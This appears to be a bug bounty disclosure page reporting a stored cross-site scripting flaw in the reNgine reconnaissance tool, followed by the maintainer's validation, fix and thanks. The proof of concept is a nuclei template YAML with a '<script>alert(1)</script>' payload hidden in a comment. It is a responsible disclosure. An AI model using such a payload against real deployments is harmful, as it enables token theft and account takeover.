Cross-site Scripting (XSS) - Stored in yogeshojha/rengine

Valid

Reported on

Aug 31st 2021


✍️ Description

Hi, When creating a template for nuclei, it is possible to upload a malicious template with xss load, clicking to see this template will run xss.

🕵️‍♂️ Proof of Concept

1- First, create the fake template:

id: poc-xss
#<script>alert(1)</script>
info:
  name: xss-storage-rengine
  author: phor3nsic
  severity: low

requests:
  - method: GET
    path:
        - "{{BaseURL}}/"

    matchers:
      - type: regex
        regex:
          - "\\<title\\>poc\\s"
        part: body

2- Upload of this template, and click to view!

💥 Impact

It's possible leak csrftoken of the users and bypass this feature, performing csrf attack for other accounts.

We have contacted a member of the yogeshojha/rengine team and are waiting to hear back 23 days ago
Yogesh Ojha validated this vulnerability 23 days ago
Walleson Moura has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yogesh Ojha
23 days ago

Maintainer


This is a good finding. Though the exploitability is very less likely. You'd have to convenience a user to upload a malicious nuclei template. And since we are likely to not have CSRF, the only way you could deliver the payload is probably social engineering.

Neverthless, a very good finding. This means you guys are hunting bugs literally everywhere lol :D Good job.

Patch is on its way

Yogesh Ojha confirmed that a fix has been merged on ab89a2 23 days ago
Yogesh Ojha has been awarded the fix bounty
Yogesh Ojha
23 days ago

Maintainer


Thank you for reporting this. I've pushed the patches. Additionally, I've also fixed XSS for Tool config input box, and GF patterns upload as well.

You may retest them and update me if you find any other instances of XSS.

Thank you again for reporting this and I very much appreciate it.

Thank you for making open source secure <3

Yogesh Ojha
23 days ago

Maintainer


Also, congratulations on this bounty. I look forward to many more such reports.

Walleson Moura
23 days ago

Researcher


Hi, Thanks for the reward, but what makes me happy is to contribute to the tool! :)